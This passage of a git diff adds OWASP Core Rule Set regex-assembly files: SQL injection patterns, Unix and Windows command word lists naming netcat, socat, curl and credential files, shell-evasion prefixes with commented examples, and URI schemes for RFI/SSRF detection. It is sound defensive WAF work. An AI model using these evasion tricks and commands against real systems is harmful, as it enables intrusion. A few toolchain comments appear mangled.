+stddev_pop
+stddev_samp
+str_to_date
+strcmp
+subdate
+substr
+substring
+substring_index
+subtime
+sysdate
+system_user
+time_format
+time_to_sec
+timediff
+timestamp
+timestampadd
+timestampdiff
+to_base64
+to_json
+to_jsonb
+tochar
+todays
+tonchar
+toseconds
+trim
+truncate
+ucase
+uncompress
+uncompressed_length
+unhex
+unistr
+unix_timestamp
+unlikely
+updatexml
+use_json_null
+utc_date
+utc_time
+utc_timestamp
+uuid
+uuid_short
+var_pop
+var_samp
+variance
+weekday
+weekofyear
+weight_string
+xmltype
+yearweek
diff --git a/nginx/config/owasp-crs/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra b/nginx/config/owasp-crs/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra
new file mode 100644
index 00000000..a58f2c42
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra
@@ -0,0 +1,23 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+create\s+function\s*?\w+\s*?\(\s*?\)\s*?-
+create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?-
+declare[^\w]+[@#]\s*?\w+
+div\s*?\([+-]*[\d.\s]+,[+-]*[\d.\s]+\)
+exec\s*?\(\s*?@
+lo_import\s*?\(
+lo_get\s*?\(
+procedure\s+analyse\s*?\(
+;\s*?declare\s+[\w-]+
+;\s*?open\s+[\w-]+
+::bigint
+::bool
+::double\s+precision
+::int
+::integer
+::numeric
+::oid
+::real
+::text
+::smallint
diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-4andup.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-4andup.ra
new file mode 100644
index 00000000..8edb5a67
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-4andup.ra
@@ -0,0 +1,574 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list was generated from the original lists with the following command: +##! awk '/^([a-z0-9_-]+)/ { x = $0; gsub(/[@~]/, "", x); if (length(x) > 3) print }' 93210{0,5}.data + +##! Note that the suffixes must be added manually to new entries. +##! To regenerate this list from unix-shell.data, run the following: +##! NL=$'\n' +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" +##! source="$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) > 3 {print y}' \ +##! rules/unix-shell.data | \ +##! sort | uniq)" +##! result="" +##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes +##! while read -r oword; do +##! # strip suffixes from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%~/}" +##! while read -r sword; do +##! # handle "clang++" +##! sword="${sword//++/\+\+}" +##! # handle "." in commands +##! sword="${sword//./\.}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! result="${result}${oword}${NL}" +##! break +##! fi +##! done <<<"${source}" +##! done <<<"${original}" + +##! # add new entries to this list +##! while read -r sword; do +##! # handle "clang++" +##! sword="${sword/%++/\+\+}" +##! # handle "." in commands +##! sword="${sword//./\.}" +##! found=0 +##! while read -r oword; do +##! # strip suffixes from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%~/}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! found=1 +##! break +##! fi +##! done <<<"${original}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${sword}${NL}" +##! fi +##! done <<<"${source}" + +##! # check entries for English words and suffix those +##! original="${result}" +##! english="$(util/fp-finder/spell.sh -m -e - <<<"${result}")" +##! result="" +##! while read -r oword; do +##! found=0 +##! 
while read -r eword; do +##! if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then +##! result="${result}${oword}@${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${english}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/include/unix-shell-4andup.ra | cut -d: -f1) +##! ed -s regex-assembly/include/unix-shell-4andup.ra <> regex-assembly/include/unix-shell-4andup.ra + +HEAD@ +POST@ +addgroup +adduser +agetty +alias@ +alpine@ +ansible-playbook +apt-get +aptitude@ +arch@ +aria2c +ascii-xfr +ascii85 +aspell +atobm +axel +base32 +base64 +basename@ +basenc +bash@ +batch@ +blkid +bpftrace +breaksw +bridge@ +bsdcat +bsdiff +bsdtar +builtin +bundler@ +bunzip2 +busctl +busybox +byebug +byobu +bzcat +bzcmp +bzdiff +bzegrep +bzexe +bzfgrep +bzgrep +bzip2 +bzip2recover +bzless +bzmore +cancel@ +capsh@ +certbot +chattr +chdir@ +check_by_ssh +check_cups +check_log +check_memory +check_raid +check_ssl_cert +check_statusfile +chflags +chgpasswd +chgrp +chmod +choom +chown +chpass +chroot@ +chsh +clang@ +clang\+\+ +cobc +column@ +comm@ +command@ +composer@ +compress@ +coproc +cowsay +cowthink +cpan +cpio +cpulimit +crash@ +cron +crontab +csplit +csvtool +cupsfilter +curl@ +dash@ +date@ +dhclient +dialog@ +diff@ +dmesg +dmidecode +dmsetup +doas +docker@ +done@ +dosbox +dpkg +dvips +e2fsck +easy_install +echo@ +efax +egrep +emacs +endif +endsw +env-update +esac +eval +exec@ +exiftool +expand@ +expect@ +export@ +expr +facter +fetch@ +fgrep +file@ +filetest +find@ +finger@ +fish@ +flock@ +fold@ +foreach +fping +ftpstats +ftpwho +function@ +gawk@ +gcore +genie@ +genisoimage +getfacl@ +ghci +gimp@ +ginsh +grep@ +group@ +groupmod +gtester +gunzip +gzcat +gzexe +gzip +hash@ +head@ +hexdump +highlight@ +history@ +hostid +hostname +hping3 +htdigest +htop +htpasswd +iconv +ifconfig +iftop +install@ +ionice +ip6tables +ipconfig +iptables +ispell +java@ +jexec +jobs@ 
+join@ +journalctl +jrunscript +kill@ +killall +knife@ +ksshell +last@ +lastcomm +lastlog +lastlogin +latex@ +ldconfig +less@ +lessecho +lessfile +lesspipe +lftp +lftpget +links@ +local@ +locate@ +loginctl +logname +logsave +look@ +losetup +ls-F +lsb_release +lscpu +lshw +lsmod +lsof +lspci +lsusb +ltrace +lualatex +luatex +lwp-download +lwp-dump +lwp-mirror +lwp-request +lynx@ +lz4c +lz4cat +lzcat +lzcmp +lzdiff +lzegrep +lzfgrep +lzgrep +lzless +lzma +lzmadec +lzmainfo +lzmore +mail@ +mailq +mailx@ +make@ +master\.passwd +mawk +mkdir@ +mkfifo +mknod +mktemp +mlocate +more@ +mosquitto +mount@ +msgattrib +msgcat +msgconv +msgfilter +msgmerge +msguniq +mutt@ +mysql +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nano@ +nasm +nawk +nc\.openbsd +nc\.traditional +ncat +neofetch +netcat +netkit-ftp +netplan +netstat +nice@ +nmap +node@ +nohup +nping +nroff +nsenter +nslookup +nstat +null@ +octave@ +onintr +openssl +openvpn +openvt +opkg +pacman@ +parted@ +passwd +paste@ +patch@ +pdflatex +pdftex +pdksh +perf +perl +perl5 +perlsh +perms@ +pftp +pgrep +php-cgi +php5 +php7 +pico@ +pidstat +pigz +ping@ +pkexec +pkg_info +pkginfo +pkill +popd +printenv +printf@ +psed +psftp +psql +ptar +ptardiff +ptargrep +puppet@ +pushd +pwd\.db +python2 +python3 +python~ +rake@ +raku +rbash +readelf +realpath +redcarpet@ +rename@ +repeat@ +replace@ +restic +rlogin +rlwrap +rmdir@ +rmuser +rnano +route@ +rpmdb +rpmquery +rpmverify +rsync +ruby~ +run-mailcap +run-parts +rview +rvim +sash@ +sched +screen@ +script@ +sdiff +self@ +sendmail +service@ +setarch +setenv +setfacl@ +setsid +sftp +sh\.distrib +shadow@ +shells@ +shuf +shutdown@ +sleep@ +slsh +smbclient +snap@ +socat +soelim +sort@ +source@ +split@ +spwd\.db +sqlite3 +ssh-keygen +ssh-keyscan +sshpass +start-stop-daemon +stdbuf +stderr +stdin +stdout +strace +strings@ +sudo +sysctl +systemctl +systemd-resolve +tail@ +tailf +task@ +taskset +tclsh +tcpdump +tcping +tcptraceroute +tcsh +telnet +tftp +time@ +timedatectl 
+timeout@ +tmux +touch@ +traceroute +traceroute6 +troff +tshark +ulimit@ +uname +uncompress@ +unexpand +uniq +unlink@ +unlz4 +unlzma +unpigz +unrar +unset@ +unshare@ +unxz +unzip@ +unzstd +up2date@ +update-alternatives +useradd +userdel +usermod +uudecode +uuencode +valgrind +view@ +vigr +vimdiff +vipw +virsh +volatility@ +wall@ +watch@ +wget +whiptail@ +whoami +whois +wireshark +wish@ +xargs +xelatex +xetex +xmodmap +xmore +xpad +xterm +xzcat +xzcmp +xzdec +xzdiff +xzegrep +xzfgrep +xzgrep +xzless +xzmore +yarn@ +yelp@ +zathura +zcat +zcmp +zdiff +zegrep +zero@ +zfgrep +zgrep +zipcloak +zipcmp +zipdetails +zipgrep +zipinfo +zipmerge +zipnote +zipsplit +ziptool +zless +zmore +zrun +zsoelim +zstd +zstdcat +zstdgrep +zstdless +zstdmt +zypper diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra new file mode 100644 index 00000000..67e2f493 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra 
@@ -0,0 +1,56 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This assembly constructs the prefix used by 932250 and 932260
+
+##! ifconfig
+^
+##! ={ifconfig}
+=
+##!=>
+
+##! match possible white space between prefix expressions
+\s*
+##!=>
+
+##! commands prefix
+##!> assemble
+ ##! time ifconfig
+ ##!> cmdline unix
+ time
+ ##!<
+ ##! { ifconfig }
+ \{
+ ##! ( ifconfig )
+ \s*\(\s*
+ ##! VARNAME=xyz ifconfig
+ \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+
+ ##! ! ifconfig
+ !\s*
+ ##! $ifconfig
+ \$
+##!<
+##!=>
+
+*
+##!=>
+
+##! match possible white space between prefix expressions
+\s*
+##!=>
+
+##! quoting prefix
+##!> assemble
+ ##! 'ifconfig'
+ '
+ ##! "ifconfig"
+ \"
+##!<
+##!=>
+
+*
+##!=>
+
+##! paths prefix (+ evasion prevention suffix [\x5c'\"]*)
+(?:[\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/)?[\x5c'\"]*
+##!=>
diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix.ra
new file mode 100644
index 00000000..3893034c
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix.ra
@@ -0,0 +1,85 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This assembly file generates a prefix match for unix shell RCE
+##! evasions. Command words, in this case, must folow the prefix.
+##! Separate rules target commands that do not follow this prefix,
+##! as the chance of false positives is higher without a prefix match.
+
+##! time ifconfig
+##!> cmdline unix
+ time
+##!<
+##! ;ifconfig
+;
+##! {ifconfig}
+\{
+##! |ifconfig
+\|
+##! ||ifconfig
+\|\|
+##! &ifconfig
+&
+##! & &ifconfig
+&&
+##! ;\nifconfig
+\n
+##! ;\rifconfig
+\r
+##! $(ifconfig)
+\$\(
+##! $((ifconfig))
+\$\(\(
+##! `ifconfig`
+`
+##! ${ifconfig}
+\${
+##! <( ifconfig )
+<\(
+##! >( ifconfig )
+>\(
+##! a() ( ifconfig; ); a
+\(\s*\)
+##!=>
+
+##! match possible white space between prefix expressions
+\s*
+##!=>
+
+##! commands prefix
+##!> assemble
+ ##! { ifconfig }
+ \{
+ ##! ( ifconfig )
+ \s*\(\s*
+ ##! VARNAME=xyz ifconfig
+ \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+
+ ##! ! ifconfig
+ !\s*
+ ##! $ifconfig
+ \$
+##!<
+##!=>
+
+*
+##!=>
+
+##! match possible white space between prefix expressions
+\s*
+##!=>
+
+##! quoting prefix
+##!> assemble
+ ##! 'ifconfig'
+ '
+ ##! "ifconfig"
+ \"
+##!<
+##!=>
+
+*
+##!=>
+
+##! paths prefix (+ evasion prevention suffix [\x5c'\"]*)
+(?:[\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/)?[\x5c'\"]*
+##!=>
diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-pl3.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-pl3.ra
new file mode 100644
index 00000000..c17b7515
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-pl3.ra
@@ -0,0 +1,27 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list contains terms that are only searched for at PL 3.
+##! Note that the equivalent could be achieved by using
+##! `include` processors with both <= 3 and > 3 but that would
+##! make the rule almost identical to its PL 1 counterparts,
+##! artificially doubling the critiality of hits and adding
+##! unnecessary overhead.
+
+##! Note that this list is arbitrary. We do not have criteria
+##! for inclusion in this list apart from false positive
+##! reports.
+
+##! This list must be in sync with:
+##! - unix-shell-upto3.ra
+##! - unix-shell-4andup.ra
+##! - unix-shell-pl3.ra
+
+aptitude@
+dnf
+pacman@
+ps
+up2date@
+vi@
+who
+w@
diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-upto3.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-upto3.ra
new file mode 100644
index 00000000..f508587b
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-upto3.ra
@@ -0,0 +1,198 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Note that the suffixes @ / ~ must be added manually to new entries. +##! To regenerate this list from unix-shell.data, run the following: +##! NL=$'\n' +##! # select words of length <= 3 +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! source=$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) <= 3 {print y}' \ +##! rules/unix-shell.data | \ +##! sort | uniq) +##! result="" +##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes +##! while read -r oword; do +##! # strip @ and ~ from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%\~/}" +##! while read -r sword; do +##! if [ "${oword_raw}" = "${sword}" ]; then +##! result="${result}${oword}${NL}" +##! break +##! fi +##! done <<<"${source}" +##! done <<<"${original}" + +##! # add new entries to this list +##! while read -r sword; do +##! found=0 +##! while read -r oword; do +##! # strip @ and ~ from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%\~/}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! found=1 +##! break +##! fi +##! done <<<"${original}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${sword}${NL}" +##! fi +##! done <<<"${source}" + +##! # check entries for English words and suffix those +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! english="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)" +##! # do not suffix the following words: +##! english="$(grep -vE 'ip|id|top|set' <<< "${english}")" +##! result="" +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then +##! result="${result}${oword}@${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${english}" +##! 
if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/include/unix-shell-upto3.ra | cut -d: -f1) +##! ed -s regex-assembly/include/unix-shell-upto3.ra <> regex-assembly/include/unix-shell-upto3.ra + +7z +7za +7zr +7zx +GET@ +ab@ +apt@ +ar@ +arj +arp@ +as@ +ash@ +at@ +awk@ +aws@ +bzz@ +c89 +c99 +cat@ +cc@ +cmp +cp@ +csh +cut@ +dd@ +df +dig@ +dir@ +dnf +du@ +eb@ +ed@ +env +eqn +es@ +esh +ex@ +fc@ +fd +fg +fi@ +fmt +ftp@ +gcc~ +gdb +gem@ +ghc +git@ +go@ +gpg +grc +hd@ +hup@ +id +ip +irb +jjs +jq +ksh +ld@ +ldd@ +ln@ +lp@ +ls +lua@ +lz4 +lz@ +man@ +mtr +mv@ +nc@ +net@ +nl@ +nm@ +npm@ +od@ +pax@ +pdb +pf@ +pg +php@ +pic@ +pip~ +pkg +pr@ +pry@ +ps@ +ptx +pwd +pxz +rar@ +rc +rcp@ +red@ +rev@ +rm@ +rpm@ +scp +sed@ +set +sg@ +sh@ +ss@ +ssh@ +su@ +svn +tac +tar@ +tbl +tcp@ +tee@ +tex@ +tic@ +top +udp +ul@ +vi@ +vim@ +w3m +w@ +wc +who@ +xxd +xz@ +yes@ +yum +zip@ +zsh diff --git a/nginx/config/owasp-crs/regex-assembly/include/url-schemes.ra b/nginx/config/owasp-crs/regex-assembly/include/url-schemes.ra new file mode 100644 index 00000000..136606e2 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/url-schemes.ra 
@@ -0,0 +1,120 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This is a list of schemes that can be used for RFI/SSRF (from https://en.wikipedia.org/wiki/List_of_URI_schemes):
+
+acap
+afp
+afs
+attachment
+beshare
+bitcoin
+blob
+callto
+cap
+cid
+cvs
+dav
+data
+dict
+dns
+dntp
+ed2k
+expect
+fd
+feed
+file
+finger
+fish
+ftp
+ftps
+git
+go
+gopher
+h323
+http
+https
+iax
+icap
+imap
+imaps
+ipp
+ipps
+irc
+irc6
+ircs
+jabber
+jar
+ldap
+ldapi
+ldaps
+local_file
+mailto
+maven
+mms
+mumble
+netdoc
+news
+nfs
+nntp
+nntps
+ogg
+paparazzi
+phar
+pop2
+pop3
+pop3s
+pres
+proxy
+psyc
+rmi
+rsync
+rtm
+rtmfp
+rtmp
+s3
+sftp
+sip
+sips
+smb
+smtp
+smtps
+sms
+snews
+snmp
+ssh
+ssh2
+svn
+svn\+ssh
+teamspeak
+telnet
+tftp
+turn
+turns
+udp
+unreal
+ut2004
+ventrilo
+view-source
+vnc
+webcal
+ws
+wss
+xmpp
+xri
+
+##! Adding also the list of PHP (sub)schemes that can be used for RFI/SSRF (from https://www.php.net/manual/en/wrappers.php):
+
+ssh2.shell
+ssh2.exec
+ssh2.tunnel
+ssh2.sftp
+ssh2.scp
+compress.zlib
+compress.bzip2
+zip
+glob
+rar
+ogg
+expect
+php
diff --git a/nginx/config/owasp-crs/regex-assembly/include/windows-commands-prefix.ra b/nginx/config/owasp-crs/regex-assembly/include/windows-commands-prefix.ra
new file mode 100644
index 00000000..bbb14520
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/windows-commands-prefix.ra
@@ -0,0 +1,72 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This assembly file generates a prefix match for windows commands.
+##! Command words, in this case, must follow the prefix.
+##! Separate rules target commands that do not follow this prefix,
+##! as the chance of false positives is higher without a prefix match.
+
+##! Note: the quoting prefixes are part of the command prefixes, except for ^
+##! which, for unknown reasons, is not part of the expression
+
+##! time cmd
+##!> cmdline windows
+ time
+##!<
+##! ;cmd
+;
+##! {cmd
+\{
+##! |cmd
+\|
+##! ||cmd
+\|\|
+##! &cmd
+&
+##! &&cmd
+&&
+##! \ncmd
+\n
+##! \rcmd
+\r
+##! `cmd
+`
+##!=>
+
+##! match possible white space between prefix expressions
+\s*
+##!=>
+
+##! commands prefix
+##!> assemble
+ ##! (cmd)
+ \(
+ ##! ,cmd
+ ,
+ ##! @cmd
+ @
+ ##! 'cmd'
+ '
+ ##! "cmd"
+ \"
+ ##! spacing+cmd
+ \s
+##!<
+##!=>
+
+*
+##!=>
+
+##! paths prefix
+##!> assemble
+ ##! /path/cmd
+ [\w'\"\./]+/
+ ##! C:\Program Files\cmd
+ [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c
+ ##! \\net\share\dir\cmd
+ [\^\.\w '\"/\x5c]*\x5c
+##!<
+##!=>
+
+?[\"\^]*
+##!=>
diff --git a/nginx/config/owasp-crs/regex-assembly/include/windows-commands.ra b/nginx/config/owasp-crs/regex-assembly/include/windows-commands.ra
new file mode 100644
index 00000000..5e36d81b
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/include/windows-commands.ra
@@ -0,0 +1,299 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932380 (RCE Windows command injection part 2/2) +##! +##! The list comes from the Microsoft Windows Server documentation. +##! You can get it using the following one-liner: +##! `curl https://raw.githubusercontent.com/MicrosoftDocs/windowsserverdocs/main/WindowsServerDocs/administration/windows-commands/windows-commands.md | grep -oE '^-\s\[\w+\]' | cut -f2 -d[ | cut -f1 -d]` + +active +add +append +arp +assign +assoc +at +atmadm +attrib +attributes +auditpol +autochk +autoconv +autofmt +automount +bcdboot +bcdedit +bdehdcfg +bitsadmin +bootcfg +break +cacls +call +cd +certreq +certutil +change +chcp +chdir +chglogon +chgport +chgusr +chkdsk +chkntfs +choice +cipher +clean +cleanmgr +clip +cls +cmd +cmdkey +cmstp +color +comp +compact +convert +copy +create +cscript +date +dcdiag +dcgpofix +defrag +del +delete +detail +dfsdiag +dfsrmig +diantz +dir +diskcomp +diskcopy +diskpart +diskperf +diskraid +diskshadow +dispdiag +dnscmd +doskey +driverquery +echo +edit +endlocal +erase +eventcreate +Evntcmd +exec +exit +expand +expose +extend +extract +fc +filesystems +find +findstr +finger +flattemp +fondue +for +forfiles +format +freedisk +fsutil +ftp +ftype +fveupdate +getmac +gettype +goto +gpfixup +gpresult +gpt +gpupdate +graftabl +help +helpctr +hostname +icacls +if +inactive +ipconfig +ipxroute +irftp +jetpack +klist +ksetup +ktmutil +ktpass +label +list +lodctr +logman +logoff +lpq +lpr +macfile +makecab +mapadmin +md +mkdir +mklink +mmc +mode +more +mount +mountvol +move +mqbkup +mqsvc +mqtgsvc +msdt +msg +msiexec +msinfo32 +mstsc +nbtstat +netcfg +netdom +netsh +netstat +nfsadmin +nfsshare +nfsstat +nlbmgr +nltest +nslookup +ntbackup +ntcmdprompt +ntfrsutl +offline +online +openfiles +pagefileconfig +path +pathping +pause +pbadmin +pentnt +perfmon +ping +pktmon +pnpunattend +pnputil +popd +powershell +print +prncnfg 
+prndrvr +prnjobs +prnmngr +prnport +prnqctl +prompt +pubprn +pushd +pushprinterconnections +pwlauncher +pwsh +qappsrv +qprocess +query +quser +qwinsta +rd +rdpsign +recover +refsutil +reg +regini +regsvr32 +relog +rem +remove +ren +rename +repadmin +repair +replace +rescan +reset +retain +revert +rexec +risetup +rmdir +robocopy +rpcinfo +rpcping +rsh +rundll32 +rwinsta +san +schtasks +scwcmd +secedit +select +serverceipoptin +servermanagercmd +serverweroptin +setx +sfc +shadow +shift +showmount +shrink +shutdown +sort +start +subst +sxstrace +sysocmgr +systeminfo +takeown +tapicfg +taskkill +tasklist +tcmsetup +telnet +tftp +time +timeout +title +tlntadmn +tpmtool +tpmvscmgr +tracerpt +tracert +tree +tscon +tsdiscon +tsecimp +tskill +tsprof +type +typeperf +tzutil +unexpose +uniqueid +unlodctr +ver +verifier +verify +vol +vssadmin +waitfor +wbadmin +wdsutil +wecutil +wevtutil +where +whoami +winnt +winnt32 +winrs +wmic +writer +wscript +xcopy diff --git a/nginx/config/owasp-crs/regex-assembly/toolchain.yaml b/nginx/config/owasp-crs/regex-assembly/toolchain.yaml new file mode 100644 index 00000000..d921b799 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/toolchain.yaml 
@@ -0,0 +1,46 @@ +# # # # # # # # # # # # # # # # # # # # +# configuration file for crs-toolchain +# # # # # # # # # # # # # # # # # # # # +patterns: + # The Unix evasion patterns, were extended per decision in https://github.com/coreruleset/coreruleset/issues/2632. + anti_evasion: + # - [\x5c'\"\[)]: common evasion tokens and path expansion, e.g., `/bin/[c]''a""\t` + # - (?:\|\||&&)\s*: hiding of empty variables through logial operators, e.g., `nc&&$u -p 777` + # - \$[a-z0-9_@?!#{(*-]*: empty variable evasion, e.g., `n\$uc -p 777` + # - [\x5c'\"\[)], \$[a-z0-9_@?!#{(*-]*: arithmetic expansion evasion, e.g., `c$((9))9` + unix: | + [\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c? + windows: | + [\"\^]* + anti_evasion_suffix: + # - <>: redirection, e.g., `cat,&|)].* + # "more foo", "more,foo", "more;foo", "more.com", "more/e", + # "morefoo" + windows: | + [\s,;./<>].* + # Same as above but does not allow any white space as the next token. + # This is useful for words like `python3`, where `python@` would + # create too many false positives because it would match `python `. + anti_evasion_no_space_suffix: + # This will match: + # + # python<<,&|]|(?:[\w\d._-][\x5c'\"\[]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{*-]*)?\x5c?)+[\s<>,&|]).* + # This will match: + # + # python,foo + # python2 foo + # + # It will _not_ match: + # python foo + windows: | + (?:[,;./<>]|(?:[\w\d._-][\"\^]*)+[\s,;./<>]).* diff --git a/nginx/config/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/nginx/config/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example new file mode 100644 index 00000000..e856911a --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example 
@@ -0,0 +1,200 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# The purpose of this file is to hold LOCAL exceptions for your site. The
+# types of rules that would go into this file are one where you want to
+# short-circuit inspection and allow certain transactions to pass through
+# inspection or if you want to alter rules that are applied.
+#
+# This file is named REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example for a
+# very specific reason. Files affixed with the .example extension are designed
+# to contain user created/modified data. The '.example'. extension should be
+# renamed to end in .conf. The advantage of this is that when OWASP CRS is
+# updated, the updates will not overwrite a user generated configuration file.
+#
+# As a result of this design paradigm users are encouraged NOT to directly
+# modify rules. Instead they should use this
+# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and the
+# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS file to modify OWASP rules using
+# methods similar to the examples specified below.
+#
+# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and
+# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS serve different purposes. ModSecurity
+# effectively maintains two different context: startup, and per transaction.
+# As a rule, directives are processed within the startup context. While they
+# can affect the per transaction context they generally remain fixed during the
+# execution of ModSecurity.
+#
+# As a result if one wanted to disable a rule at bootup the SecRuleRemoveById
+# directive or one of its siblings would have to be placed AFTER the rule is
+# listed, otherwise it will not have knowledge of the rules existence (since
+# these rules are read in at the same time). This means that when using
+# directives that effect SecRules, these exceptions should be placed AFTER all
+# the existing rules. This is why RESPONSE-999-EXCLUSION-RULES-AFTER-CRS is
+# designed such that it loads LAST.
+#
+# Conversely, ModSecurity supports several actions that can change the state of
+# the underlying configuration during the per transaction context, this is when
+# rules are being processed. Generally, these are accomplished by using the
+# 'ctl' action. As these are part of a rule, they will be evaluated in the
+# order rules are applied (by physical location, considering phases). As a
+# result of this ordering a 'ctl' action should be placed with consideration to
+# when it will be executed. This is particularly relevant for the 'ctl' options
+# that involve modifying ID's (such as ruleRemoveById). In these cases it is
+# important that such rules are placed BEFORE the rule ID they will affect.
+# Unlike the setup context, by the time we process rules in the per-transaction
+# context, we are already aware of all the rule ID's. It is by this logic that
+# we include rules such as this BEFORE all the remaining rules. As a result
+# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS is designed to load FIRST.
+#
+# As a general rule:
+# ctl:ruleEngine -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveTargetById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveTargetByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveTargetByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+#
+# SecRuleRemoveById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleRemoveByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleRemoveByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleUpdateActionById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleUpdateTargetById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleUpdateTargetByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
